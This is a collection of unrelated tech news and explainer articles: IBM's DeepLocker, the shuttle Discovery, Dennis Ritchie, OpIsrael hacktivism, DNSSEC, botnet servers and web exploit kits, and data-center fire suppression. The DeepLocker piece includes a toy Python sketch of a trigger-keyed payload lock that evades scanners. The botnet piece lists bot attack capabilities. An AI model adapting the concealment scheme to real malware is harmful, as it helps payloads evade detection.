Unlike with board games, where the victor is clear-cut, the value of arguments is inherently subjective, meaning the AI must adapt its logic to human rationale when arguing a point, and do so extremely quickly in an unscripted manner.
Data-driven speech writing and delivery, listening comprehension that can pick up on the nuances and complexities of human language, and a modelling system that uses human dilemmas to enable principled arguments to be formed are the three capabilities that underpin Project Debater’s ability for unscripted reasoning.
With the shift to machine learning and artificial intelligence being touted by IBM as the next major progression in IT, researchers have also begun developing a new breed of highly evasive proof-of-concept malware, dubbed DeepLocker, which conceals itself until it reaches a specific, pre-programmed victim.
Most security software today is rules based, but AI can circumvent these rules by learning and understanding them over time. The AI model in DeepLocker is specifically trained to behave within the rules it has learnt unless it is presented with a victim-specific trigger.
These triggers include visual, audio and geolocation features. During a demonstration, for example, one of the researchers working on the technology, cryptographer Marc Stöcklin, trained DeepLocker to recognise the face of an IBM employee.
Upon seeing the employee’s face through a laptop webcam, the malware released its malicious payload and infected the machine.
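The concealment idea can be sketched in a few lines: derive the decryption key from an attribute of the intended target, so the payload stays opaque to anyone — including a rules-based scanner — who never observes the trigger. The toy below substitutes a plain string for the face-recognition trigger and uses a SHA-256-derived XOR keystream as a stand-in cipher; it is a conceptual illustration of key derivation, not DeepLocker’s actual design:

```python
import hashlib

def keystream(secret: bytes, length: int) -> bytes:
    """Derive a repeatable XOR keystream from a secret via SHA-256 (toy KDF)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(secret + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def lock(payload: bytes, trigger: bytes) -> bytes:
    # XOR payload with a keystream derived from the trigger value.
    return bytes(a ^ b for a, b in zip(payload, keystream(trigger, len(payload))))

def try_unlock(blob: bytes, observed: bytes) -> bytes:
    # XOR is symmetric: only the exact trigger value reproduces the payload.
    return lock(blob, observed)

blob = lock(b"benign demo payload", b"alice@example.com")
print(try_unlock(blob, b"mallory@example.com"))  # gibberish
print(try_unlock(blob, b"alice@example.com"))    # original bytes
```

Because the key never appears in the binary — only the derivation recipe does — static analysis of the locked blob reveals nothing, which is precisely what makes this class of malware so evasive.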
By developing this technology, IBM Research claims it can better understand the cyber threats of the future, likening its method to examining the virus to create a vaccine. | <urn:uuid:7da17b5c-6ac1-4c8e-93d8-ef8358302182> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/IBM-pushes-the-boundaries-of-AI-but-insists-companies-take-an-ethical-approach | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.952047 | 3,296 | 3.03125 | 3 |
After just shy of 40 successful space journeys, the NASA shuttle Discovery headed to the International Space Station (ISS) Thursday on a final mission that followed repair problems and bad weather.
Known as “STS-133,” Discovery’s last voyage will take 11 days. The shuttle is delivering a variety of parts and modules to the space station and carrying an interesting hitchhiker – a humanoid robot named “Robonaut 2,” or “R2.”
“Discovery’s final flight involves delivery of a last few components to the ISS,” said Stevens Institute of Technology space systems engineering professor Debra Lepore, former lead engineer for the technical panel of the U.S. Congressional Space Launch Modernization Plan.
“The components can house science experiments, help expand laboratory capabilities, and increase storage space,” Lepore told TechNewsWorld. “Think of them like additional rooms added to a modular home.”
With Discovery in retirement, NASA will shutter its entire shuttle program after two more missions are completed.
U.S. Representative Gabrielle Giffords — recovering from gunshot wounds in a Houston rehabilitation clinic — will watch as her husband Mark Kelly joins the shuttle Endeavour crew for its final flight April 19.
The shuttle Atlantis flies June 28.
Named after a seagoing vessel piloted by 17th century explorer Henry Hudson, Discovery started her career in 1984, going on to a “rich history in human space flight,” NASA Administrator Charles Bolden blogged in a final tribute.
“It was my honor to fly aboard Discovery on the STS-31 mission in 1990, when she brought the Hubble Space Telescope into orbit. And on STS-60, when Sergei Krikalev, the first Russian to fly on an American spacecraft, was a crew member,” he recalled.
With her uplifting history, Discovery kept the flames of space exploration alive in the wake of the Challenger and Columbia shuttle tragedies, wrote Bolden.
“The Discovery is now the oldest operating shuttle, after the very sad loss of Challenger, Columbia, and their crews,” said human space exploration researcher Stephen Braham, Ph.D., who directs the Simon Fraser University PolyLAB.
“Along with the Hubble telescope, Discovery launched many spacecraft, including the Advanced Communication Test Satellite (ACTS),” Braham told TechNewsWorld. “ACTS defined modern Ka-band communications, and was used by my team in the Arctic in 1999, at the NASA Haughton-Mars Project.”
Discovery, in fact, may be the most successful spacecraft in history. She’s carried more crews safely to and from space than any other ship. Among many firsts: She was first to bring a satellite back to Earth; first to have a female pilot at the helm; first to carry the oldest person into space — 77-year-old John Glenn; first to host an African-American space walker; and first to fly a member of Congress into orbit, Utah Senator Jake Garn.
Her final mission, Braham said, “is critical, and involves veteran NASA astronauts for that importance.”
Not only will the team install the last modular ISS components, but they will be “demonstrating the importance of next-generation tele-robotics for future Solar System exploration,” Braham said. “Robonaut 2 will allow us to understand how humans can operate robots to maintain systems in space, and also to explore the surface of Mars, and the moons of Mars.”
After the shuttle program closes this year, “the U.S. will have to rely on Russia for the manned part of the International Space Station until private outfits can come on line,” said UCLA aerospace engineering Ph.D. candidate Lord Cole.
“Because the space shuttle program was such a large part of NASA and its public image, it will be interesting to see what direction they go in,” Cole told TechNewsWorld.
With Russia ferrying crews to and from orbit, the ISS may become a national laboratory that allows a much broader array of international partners to conduct “good science,” Stevens’ Lepore explained. “It could change in tandem with private ventures to replace the shuttle program.”
Calling Thursday’s launch “bittersweet,” NASA’s Bolden wrote that he looks to the commercial aerospace industry as a major part of “what the future holds for humans in space. Commercial space is fast becoming a reality.”
For now, however, Bolden wished his crew “Godspeed, on this tough bird’s final voyage.” | <urn:uuid:7646173d-664a-453e-8e34-5a87b71eb503> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/discovery-blazes-one-last-trail-71951.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.932259 | 995 | 2.859375 | 3 |
Legendary computer scientist and creator of the C programming language Dennis Ritchie has died at the age of 70, leaving behind a legacy that touches virtually every aspect of modern life.
“Dennis was well-loved by his colleagues at Bell Labs and will be greatly missed,” wrote Jeong Kim, president of Alcatel-Lucent Bell Labs, in a statement on Thursday. Ritchie was employed at Bell Labs from 1967 to 2007, though he continued afterward in a consulting role.
Calling Ritchie “one of the most respected researchers from Bell Labs,” Kim went on to list many of the scientist’s key accomplishments, including not just the creation of C and coinvention of the Unix operating system with colleague Ken Thompson, but also the Plan 9 and Inferno operating systems as well.
Ritchie was awarded the 2011 Japan Prize in May, adding to a long list of other awards, including also the Association for Computing Machinery Turing Award in 1983 and the U.S. Medal of Technology in 1999.
Confirmation of the exact date of Ritchie’s death was not available at press time. He had reportedly been ill for some time.
‘It’s Hard to Think of a Bigger Legacy’
News of Ritchie’s death was apparently first revealed to the world on Google+ by Rob Pike, a distinguished engineer at Google who worked with Ritchie on numerous occasions.
“It’s pretty amazing how much of an influence [Ritchie] had,” Pike told TechNewsWorld. “[Steve] Jobs died last week, which was also very sad, but I think Dennis in some ways had a bigger effect on things. All those great things Jobs and his company built were based on C and things derived from C.”
The Internet, too, “is basically a C shop,” Pike noted. “The Linux machines that are the bedrock of the Web and other Unix variants are all written in C; browsers are all written in C or C++; Apache is written in C.
“You’ve got all these operating systems, languages and programs all building on Dennis’ work,” Pike concluded. “It’s hard to think of a bigger legacy.”
‘People Are Still Building on It’
Indeed, “so many of the things we use today are basically programs that are written in C or languages that derived from it,” agreed Brian Kernighan, professor in the department of computer science at Princeton University and coauthor with Ritchie on the classic programming tome, The C Programming Language.
Operating systems, the Internet and even the phone system are “all basically building on things that Dennis did,” Kernighan told TechNewsWorld. “It’s sort of invisible until you start to think about it.”
In some ways “it’s probably surprising that the work that was done 40 some years ago is still so central and critically important, and that people are still using and building on it,” Kernighan added. At the same time, “I think it’s going to stay that way for some while.”
‘Impossible to Overstate the Importance’
It’s “impossible to overstate the importance of the C programming language,” agreed Randal Bryant, dean and university professor with the School of Computer Science at Carnegie Mellon University.
Today, “C, and its successor C++, are the two most important languages for writing programs that require high performance and close control over memory resources,” Bryant told TechNewsWorld. “Most of the world’s code for managing computers and networks and for processing database transactions is written in either C or C++.
“Compilers can generate machine code from C and C++ programs that is as good or better than hand-crafted assembly code,” Bryant added. “In addition, C has had strong influence on more recent languages, including Java.”
‘A Unique Invention That Showed Real Genius’
Avi Rubin, professor of computer science at Johns Hopkins University, is one of the many who cut their proverbial programming “teeth” on Kernighan and Ritchie’s book, and he expressed similar awe at the impact of Ritchie’s work.
“Steve Jobs was such a high-profile person, but I’m a little sad that only the computer people are going to be aware of what we’ve lost now,” Rubin told TechNewsWorld.
“He was the father of Unix, which is the core of Apple’s operating system,” Rubin explained. “Without what he did, the Internet wouldn’t be what it is today, servers and high-performance computing wouldn’t be possible.”
Furthermore, the C language “didn’t have anything to model itself after — it was a unique invention that showed real genius,” Rubin pointed out. “Probably more code was written in the last 25 years in C than in any other programming language.”
In short, he concluded, Ritchie was “one of key people to getting the world to where it is today.”
‘People Need to Know Who He Was’
Ritchie’s work may be taken for granted by many, but there’s been an outpouring of reaction to his death from those in the technology community.
“Dennis Ritchie was the engineer/architect whose chapel ceiling Steve Jobs painted,” wrote Linux fan @cmastication on Twitter, for example.
Elsewhere, an obituary put similar sentiments into programming syntax.
Pike said he’s been impressed by the strength of the tech community’s response.
“He’s not a household name,” Pike said, “but I really think people need to know who he was.” | <urn:uuid:c889264b-6053-4d16-a175-47d980637bdc> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/tech-world-mourns-loss-of-dennis-ritchie-father-of-c-and-unix-73496.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.969042 | 1,270 | 2.578125 | 3 |
The essence of cybercrime is to defeat the safety systems that are in place. These safety systems or cyber defenses can be virus protection software, intrusion prevention tools, data loss protection tools, or cyber-safety training for employees who use corporate IT resources. There are a wide variety of cyber protection practices and devices. Some of these defenses are more effective than others. The most effective defenses are combinations of multiple tools to help protect networks and information from cybercriminals. Remember, the job of the cybercriminal is to defeat the system in order to gain access to internal network resources. Our job is to make it impossible for hackers to defeat the defenses. | <urn:uuid:e8d625d6-faec-428a-81e7-4a868d264d30> | CC-MAIN-2022-40 | https://www.networkcritical.com/single-post/inviktus-the-unconquerable-one | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.942396 | 129 | 3.09375 | 3 |
Heather Oliver is a Technical Writer for Constellix and DNS Made Easy, subsidiaries of Tiggee LLC.
The Domain Name System (DNS) is the backbone of the internet. It’s how computers and IoT devices are able to communicate with one another and how users reach an online destination. DNS got its start in 1983, but a lot’s changed in 38 years. In fact, since 1995, internet users have increased from 16 million or 0.4% of the world to a staggering 4.66 billion users as of January 2021—that’s 59.5% of the global population.
Such enormous growth in internet usage calls for greater security measures – and that’s where the Domain Name System Security Extensions (DNSSEC) come in. While the original DNSSEC technology was actually released in 1997, it wasn’t until 2005 that it evolved into the DNSSEC that’s commonly used today.
The nitty-gritty on DNSSEC is that it creates cryptographic signatures for existing DNS records. This is achieved with private and public signing keys that validate query responses. When DNSSEC is set up for a domain, resolvers can compare digital signatures and confirm that the DNS record request is coming from an authoritative nameserver. This not only proves the integrity of the data, but also ensures that the request wasn’t altered or contains a fake record.
A DNSSEC-enabled zone is secured by grouping all DNS records of the same type into a Resource Record Set (RRset). Rather than the individual records, the RRsets are what is digitally signed.
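Grouping records into RRsets is easy to picture: every record sharing the same owner name and type lands in one set, and that set is the unit that gets signed. A minimal sketch, with records simplified to name/type/value triples (real records also carry class and TTL fields):

```python
from collections import defaultdict

# Simplified resource records: (owner name, type, value).
records = [
    ("example.com.", "A",  "203.0.113.10"),
    ("example.com.", "A",  "203.0.113.11"),
    ("example.com.", "MX", "10 mail.example.com."),
    ("www.example.com.", "A", "203.0.113.20"),
]

rrsets = defaultdict(list)
for name, rtype, value in records:
    rrsets[(name, rtype)].append(value)   # one RRset per (name, type) pair

for key, values in sorted(rrsets.items()):
    print(key, values)
```

Here the two A records for example.com form a single RRset and receive one signature, rather than one signature per record.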
DNSSEC uses digital signatures that are based on public key cryptography. Each DNS zone for a domain with DNSSEC enabled has a public and a private key, which is used to sign or authenticate the DNS data for that particular zone.
As you might have guessed, the private key is known only to the zone owner, which protects the sensitive material needed to sign DNS records. The public key, on the other hand, is published in the DNS zone and is there for any recursive resolver to retrieve. Once data is validated, the response is sent on to the end user. If the request fails to authenticate, the user will receive an error message.
The KSK represents a public/private key combination and is what is used to validate the ZSK. This key is a long-term key (replaced annually) and is always tied to a host zone—it can’t exist without it. The KSK signs the public portion of the ZSK.
The ZSK corresponds with the private key in a DNS zone and is a short-term key, as it is changed more often (usually quarterly) than the Key Signing Key (KSK). This key is used to sign and verify the non-key records of a domain’s DNS zone.
Ultimately, DNSSEC is based on a chain of trust: each zone’s keys are vouched for by its parent zone, all the way up to the root.
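The two-level key hierarchy — the KSK vouching for the ZSK, and the ZSK vouching for ordinary record sets — can be sketched as follows. Note the heavy simplification: real DNSSEC uses asymmetric algorithms such as RSA or ECDSA, so resolvers verify with public keys only; the HMAC here is merely a stand-in to show the chain structure:

```python
import hmac, hashlib

def sign(key: bytes, data: bytes) -> bytes:
    # Stand-in "signature". Real DNSSEC uses asymmetric algorithms (RSA,
    # ECDSA); HMAC is symmetric and used here only to illustrate the chain.
    return hmac.new(key, data, hashlib.sha256).digest()

ksk = b"long-term key-signing key"
zsk = b"short-term zone-signing key"

rrset = b"example.com. A 203.0.113.10 203.0.113.11"
rrsig_for_rrset = sign(zsk, rrset)   # ZSK signs ordinary record sets
rrsig_for_zsk = sign(ksk, zsk)       # KSK signs (vouches for) the ZSK

def validate(rrset, rrsig, zsk, zsk_sig, ksk):
    """Accept data only if the whole chain checks out."""
    zsk_ok = hmac.compare_digest(sign(ksk, zsk), zsk_sig)
    data_ok = hmac.compare_digest(sign(zsk, rrset), rrsig)
    return zsk_ok and data_ok

print(validate(rrset, rrsig_for_rrset, zsk, rrsig_for_zsk, ksk))                          # True
print(validate(b"example.com. A 198.51.100.9", rrsig_for_rrset, zsk, rrsig_for_zsk, ksk)) # False
```

If either link fails — a tampered record set or an unvouched-for ZSK — validation fails, which is exactly the behaviour that lets a resolver reject forged answers.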
DNSSEC introduces several new record types that handle signature validation and that hold the cryptographic signatures that work alongside all common DNS record types. These records are:
- RRSIG – the cryptographic signature for an RRset
- DNSKEY – the public signing key for a zone
- DS – a hash of a DNSKEY, published in the parent zone to link the chain of trust
- NSEC/NSEC3 – records that provide authenticated proof that a name or record type does not exist
Tip: DNS Viz is a helpful tool for validating or troubleshooting the DNSSEC of a specific zone. It provides you with a visual analysis of the authentication chain, its resolution path, and lists configuration errors.
DNSSEC can play an important role in DNS security, especially for corporate organizations in the financial or medical sectors or those that handle sensitive personal information, as well as domains that are at high risk for cyberattacks. It’s worth mentioning, however, that implementation requires extra care in order to avoid resolution problems. Furthermore, DNSSEC doesn’t protect against DDoS or other types of cyberattacks, so you still want to make sure all your bases are covered.
A biometric technology that authenticates users on the Basis of vein pattern recognition rather than iris scans or fingerprint readers. The world’s first “Contactless Vein Authentication” technology developed by Fujitsu offers even more security and ease of use and overcomes previous problems related to security concerns. It accurately identifies an individual using the complex vein pattern in the palm of their hand. The technology is incredibly secure – only granting access if blood is flowing through the circulatory system. It is now able to be used in a wide range of situations thanks to reductions in size, reductions in cost, and simplification of development. | <urn:uuid:12cc3e0f-d7a0-441c-9548-3024fa176643> | CC-MAIN-2022-40 | https://identytech.com/palm-vein-recognition/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00515.warc.gz | en | 0.922235 | 128 | 2.578125 | 3 |
OpIsrael Cyber Attack
Operation Israel refers to a series of cyber attacks that occur each year in early April, and are carried out by pro-Palestinian hackers, who identify as part of the Anonymous group.
History of OpIsrael attacks
The first attack began in 2013 and was planned for Holocaust Memorial Day – April 7, 2013. The website of the “Bigger Than Life” organization, which accompanies families whose children are diagnosed with cancer, was attacked and its home page was vandalized with antisemitic and anti-Israel messages. Other sites such as Yad Vashem, the Ministry of Defense, the Election Commission and the Ministry of Foreign Affairs were shut down for several hours.
The attack was also accompanied by false reports published by the hackers, including claims of $5 billion in damages.
A group of hackers calling themselves “Anonymous-Arab” announced denial-of-service attacks against Israeli websites. E-mail addresses and passwords belonging to the Israeli Export Institute were also published, according to the attackers. The Export Institute stated in response that this was an old list of addresses that could easily be found on its website and that the published passwords were incorrect. In addition, a list of more than 1,300 e-mail addresses from various sources combined with passwords was published, and users were advised to change their passwords following the attack.
On March 29, pro-Palestinian hacker groups affiliated with the international collective Anonymous announced another coordinated cyber attack, again set for April 7 of that year. The attack came in response to Operation Protective Edge.
As part of the threat, the spokesman announced that they intended to bring down military and government sites on the day of the attack.
In the days leading up to the attack, the website of Meretz, a left-wing party, was hacked and its homepage defaced with pro-Palestinian messages.
The main attack came on April 7, 2015, during which personal details such as e-mail accounts, credit card numbers and Facebook accounts were leaked, most of which were inactive or incorrect. The sites mainly affected by the attack were musicians’ official sites and a few others.
Types of OpIsrael attacks
Ransomware
Popular among hackers and involved in 22% of all cyberattacks, a ransomware attack begins with the installation of malicious software. This malware is designed to lock our data and hold it “captive” until the hacker’s demands are fulfilled. The malware can encrypt the information or lock our device, thus preventing access.
There are several types of ransomware:
Encryption- This type of malware locates files that seem important to the user – texts, documents, images, PDFs and more. It encrypts the information, thus preventing access to it. When the victim is an individual, the ransom usually amounts to several hundred dollars, which must be paid within 72 hours; otherwise, the data is permanently deleted.
Lock- The user is locked out of the device entirely, and the ransom message appears on the screen.
Scareware- Perhaps the most cynical of them all, this attack mimics software that scans for security issues, such as an antivirus, and alerts us of critical findings. The error messages mimic legitimate antivirus software and create a sense of trustworthiness by displaying the victim’s IP address and geographic location, or by using the names of reputable and trusted companies. Access is then denied until the victim pays for the malware to “repair” these non-existent issues.
DoxWare- Ransomware that threatens to leak victims’ data to sites on the Dark Web. The attacker might sell this information or leak it to sites for free.
Utilizing security vulnerabilities in websites
Exploiting security vulnerabilities in websites in order to infiltrate databases that contain sensitive information such as usernames, passwords, email addresses, residential addresses, and credit card information.
SQL injection is very similar to XSS: it, too, injects code into sensitive places on a site, such as form fields and search fields. The difference is the goal – when performed on an unprotected site, an SQL injection can retrieve information from the site’s database, such as usernames and passwords.
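The standard defence is never to splice user input into the query string. The sketch below contrasts a vulnerable concatenated query with a parameterized one, using Python’s built-in sqlite3 module, an invented table, and a textbook `' OR '1'='1` payload:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

attacker_input = "nobody' OR '1'='1"

# Vulnerable: user input concatenated straight into the SQL string, so the
# injected OR clause matches every row.
vulnerable = conn.execute(
    f"SELECT secret FROM users WHERE name = '{attacker_input}'"
).fetchall()

# Safe: parameterized query — the driver treats the input as a value, never as SQL.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (attacker_input,)
).fetchall()

print("vulnerable query leaked:", vulnerable)  # [('hunter2',)]
print("parameterized returned: ", safe)        # []
```

The same placeholder mechanism exists in every mainstream database driver, which is why parameterized queries (or an ORM that uses them) are the first thing auditors check for.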
DDoS – denial of service
An attempt to make an internet service – like a website – unavailable to its users, usually by temporarily disrupting the server on which the site is hosted. There are many types of DDoS, but the essence is flooding the site and its server with malicious traffic until it shuts down from overload – often by using many devices that were previously hacked and are exploited without the knowledge of their owners. Hackers have been perfecting these attacks by using AI (artificial intelligence). But the outlook is not entirely bleak: artificial intelligence can also be used defensively to search systems for vulnerabilities, especially where large amounts of data are available.
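Real DDoS mitigation happens at network scale — scrubbing services, anycast, upstream filtering — but the core flood-detection idea can be illustrated with a per-client sliding-window rate limiter. This is a conceptual sketch, not a production defence:

```python
from collections import deque

class SlidingWindowLimiter:
    """Allow at most `limit` requests per client within `window` seconds."""
    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.hits = {}  # client id -> deque of request timestamps

    def allow(self, client: str, now: float) -> bool:
        q = self.hits.setdefault(client, deque())
        while q and now - q[0] >= self.window:
            q.popleft()                 # forget requests outside the window
        if len(q) < self.limit:
            q.append(now)
            return True
        return False                    # over budget: drop or challenge

limiter = SlidingWindowLimiter(limit=3, window=1.0)
results = [limiter.allow("203.0.113.99", t) for t in (0.0, 0.1, 0.2, 0.3, 1.2)]
print(results)
```

A burst of four requests inside one second trips the limiter on the fourth; once the window slides past the burst, the client is served again — the same accept/reject logic that sits, at vastly larger scale, inside commercial DDoS filters.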
SMS and panic calls
Events of this kind are intended to cause public panic. During OpIsrael 2015, SMS messages were sent to a large number of Israelis.
Defacement
Replacing the home page of a site that has a low level of security. Instead of the proper home page, there will be abusive sentences, political slogans, or any other message the hacker wants to convey.
Botnets are moving toward a more P2P-like communication strategy, but there remain ‘nets which rely on a single server. Bots have been spotted running on compromised Web servers, too, so that they can easily exploit browser vulnerabilities on their victims. Code running on a Web server can be considered a “server side” of botnets, and so can an actual bot server. In this article, we would like to explore what capabilities a bot server has, as well as talk about some Web exploitation kits.
Command and Control
Regardless of the fact that P2P technologies are starting to be used for communication between bots, it is still useful to understand how the less evolved bots function. The new P2P-enabled bots have the same functionality at their core, so the concept is the same.
A bot herder who controls a bot server (or multiple servers) has at his disposal a number of interesting tools. We briefly talked about what botnets are used for in the introduction to this series, but now let’s take a more detailed look at the actual commands a server can send to bot clients.
Botnets have various capabilities, including denial-of-service attacks, spam relays, and theft of personal information. They can even start Web servers on infected computers to aid in phishing attacks. Here’s a brief list of a few of the more interesting things bots can be instructed to do:
- Start flooding a specific IP or network using TCP, UDP, or ICMP
- Add/delete Windows services from the registry
- Test the Internet connection speed of the infected computer
- Start the following services: http proxy, TCP port redirector, and various socks proxies
- Run their own IRC server, becoming a master for other bots to connect to
- Capture or “harvest”: CD Keys from the Windows registry, AOL traffic including passwords, and the entire Windows registry itself
- Scan and infect other computers on the local network
- Send spam
- Download and execute a file from a given FTP site
Moreover, if that was not horrific enough for you, consider the following: all of the IRC bots have modular capabilities. Therefore, if someone programs a new module to extend the bots’ capabilities, the owner of the botnet simply runs a single command to install and use the new module on every bot.
Web Exploitation Kits
These kits allow the attacker to gain control of a client machine when it visits a malicious Web page. The most common avenue of attack is via browser vulnerabilities. The attacking code will instruct the Web browser to download and execute malicious code without the user even knowing. It isn’t always a matter of “stupid user that clicked yes,” which is why it is so important to install patches as soon as they are released.
It is extremely rare for attack code to be part of the initial exploit. Instead, it generally instructs the victim browser to download the exploit from another server. A malicious Web page doesn’t generally host the exploit, probably because it’d be reported even more quickly. The server hosting the actual exploit is generally a Web server that was running some piece of PHP (or other) code that allowed someone to secretly upload whatever they wanted. This is caused by mistakes in server configuration, Web application programming errors, or sometimes just plain old security holes in the underlying technologies used.
Of course, attackers need to be able to keep track of which IPs they have compromised. MPack and IcePack are the two most popular kits available. They both provide the user with a Web interface and configuration options to set up a “downloader.” The downloader is the program that gets run on exploited machines after an attack has succeeded. The downloader will fetch and execute malware from wherever it’s configured to do so, and it can use encryption to avoid network-based detection.
These Web kits provide attackers with a neat Web page to view statistics about their attack progress. It provides information about how successful the attack is, as well as lists of already-compromised IP addresses. This excellent honeynet.org paper describes the process in more detail, but suffice it to say, this is extremely trivial stuff. Anyone who gets a hold of IcePack, for example, can quickly begin compromising their Web site visitors’ computers. No skill, and no knowledge of the actual exploits is required.
Compromised Web servers, whatever their platform, pose a great threat to overall Internet safety. Vulnerable applications exist on every type of Web server, and the underlying OS does nothing to prevent simple exploits from taking place.
Simple exploits, like inserting a little text into a site, used to be pretty innocent. Script kiddies, as they were called, would run other peoples’ exploits and deface sites with obscene text or their groups’ markings. Every once in a while they would try running some code to open a backdoor into a Unix server, which allowed them access as the user the Web server ran as. But now, with botnets and automated attacks, a simple exploit like this is pretty serious.
Web servers play a huge role in the initial infection, re-infection, and maintenance of botnets. Very often the “downloader” provided by the Web exploitation kits will be used to install bot client software. This is likely an extremely effective method of expanding a botnet, since network-based attacks can be blocked and are more likely to be patched.
Fixing all Web server holes won’t stop users from getting infected by any means, but understanding the role of exploited Web servers in the malware ecosystem helps us learn how to fight it. | <urn:uuid:02a50df4-0a57-4bc1-a37b-ecd54f1f2a72> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/security/the-botnet-ecosystem-compromised-servers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00515.warc.gz | en | 0.935107 | 1,171 | 2.9375 | 3 |
On a basic level, artificial intelligence (AI) security solutions are programmed to identify “safe” versus “malicious” behaviors by cross-comparing the behaviors of users across an environment to those in a similar environment. This process is often referred to as “unsupervised learning” where the system creates patterns without human supervision. For some AI platforms, like Vectra, “deep learning” is another key application for identifying malicious behaviors. Inspired by the biological structure and function of neurons in the brain, deep learning relies on large, interconnected networks of artificial neurons. These neurons are organized into layers, with individual neurons connected to one another by a set of weights that adapt in response to newly arriving inputs.
Sophisticated AI cybersecurity tools have the capability to compute and analyze large sets of data allowing them to develop activity patterns that indicate potential malicious behavior. In this sense, AI emulates the threat-detection aptitude of its human counterparts. In cybersecurity, AI can also be used for automation, triaging, aggregating alerts, sorting through alerts, automating responses, and more. AI is often used to augment the first level of analyst work.
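As a toy illustration of this pattern-based flagging — not Vectra’s actual algorithm, and with invented user names and counts — a robust outlier rule such as the modified z-score can separate one user’s anomalous activity from the population baseline:

```python
from statistics import median

def flag_anomalies(counts, threshold=3.5):
    """Flag users whose activity deviates sharply from the population baseline,
    using the modified z-score (median / median-absolute-deviation)."""
    values = sorted(counts.values())
    med = median(values)
    mad = median(abs(v - med) for v in values)  # median absolute deviation
    return {user: c for user, c in counts.items()
            if mad > 0 and 0.6745 * abs(c - med) / mad > threshold}

# Daily login counts per user; one account is wildly out of line
logins = {"alice": 12, "bob": 9, "carol": 11, "dave": 10, "mallory": 480}
print(flag_anomalies(logins))  # {'mallory': 480}
```

Median-based statistics are used here rather than mean and standard deviation because, in small samples, a single huge outlier inflates the standard deviation enough to hide itself; production systems add many more features and adaptive baselines, but the flagging principle is the same.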
AI security solutions are able to identify, predict, respond to, and learn about potential cybersecurity threats, without depending on human input. Sophisticated AI security tools can:
AI cybersecurity provides many benefits to companies and their existing IT and security teams. A few of the most high-value benefits include:
When deciding on an AI security vendor, it is essential to ask the correct questions to evaluate whether or not that vendor provides an AI driven cybersecurity solution that can effectively protect your network. Below are nine of the best questions to ask and reflect on:
As enterprises begin to implement AI technology in their cybersecurity infrastructure, malicious actors are staying up to date and adapting their methods to stay off the radar. Cybercriminals may figure out a solution’s threat-flagging mechanism, allowing them to modify their attack strategy to avoid detection and increase the speed of attacks.
Thanks to automated detection capabilities, AI cybersecurity tools enable enterprises to identify, locate, quarantine, and remediate threats more efficiently.
With the development of machine learning technologies, AI is set out to become an integral part of cybersecurity. Though AI might not take over cybersecurity completely, it will be able to manage a network’s safety with minimal supervision.
There aren’t any inherent downsides to using AI for cybersecurity. The potential issues arise when cybersecurity experts start relying solely on the technology to hunt and fix threats.
As a leader in network detection and response (NDR), Vectra AI protects your data, systems and infrastructure. Vectra AI enables your security operations center (SOC) team to quickly discover and respond to would-be attackers—before they act. Vectra AI rapidly identifies suspicious behavior and activity on your extended network, whether on-premises or in the cloud. Vectra will find it, flag it, and alert security personnel so they can respond immediately. Vectra AI is Security that thinks®. It uses artificial intelligence to improve detection and response over time, eliminating false positives so you can focus on real threats. | <urn:uuid:c9a6f9da-b78c-49e6-bbbc-29aef87c8663> | CC-MAIN-2022-40 | https://www.vectra.ai/learning/ai-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00515.warc.gz | en | 0.92287 | 665 | 3.03125 | 3 |
Data centers have had a problem with fire suppression systems. While trying to remove the threat of fire damage, they have actually introduced dangers of their own. These systems operate by flooding the data center with inert gas, preventing fire from taking hold. However to do this, they have to fill the space quickly, and this rapid expansion can create a shockwave, with vibrations that can damage the hard drives in the facility’s storage systems.
A year ago, this happened in Glasgow, where a fire suppression system took out the local government’s email systems. And in September, ING Bank in Romania was taken offline by a similar system. At the bank, there wasn’t even a fire: the system wrecked hard drives during a planned test of the fire suppression system - one which had been unwisely scheduled for a busy lunchtime period.
A recurring problem
These are just the incidents we know about. Ed Ansett of i3 has told us that this same problem has occurred on many occasions, but the data centers affected have chosen not to share the information.
It’s also likely these faults will happen more frequently as time passes, because hard drives are evolving. To make higher capacity drives, vendors are allowing read/write heads to fly closer to the platters. This means they can resolve smaller magnetic domains, and more bits can fit on a disk. These drives have a smaller tolerance to shaking.
This is a shame, because information leads to understanding, which is the key to solving the problem. To solve the problem, we need a scientific examination of how these incidents occur. And it turns out this is exactly what has been happening.
At DCD’s Zettastructure event in London I heard about two very promising lines of enquiry that could make this problem simply disappear.
New nozzles - or better design?
Fire suppression vendor Tyco believes that with drives becoming more fragile, more gentle nozzles are needed. The company has created a nozzle which will not shake drives, and will eventually be available as an upgrade to existing systems. Product manager Miguel Coll told me that the new nozzle is just as effective in suppressing fires, but does not produce a damaging shockwave.
That sounds like a problem solved - but there’s another approach. Future Facilities is well known for its computational fluid dynamics (CFD) software, which models the flow of air in data centers and is usually used to ensure that hot air is removed efficiently and eddies don’t waste energy.
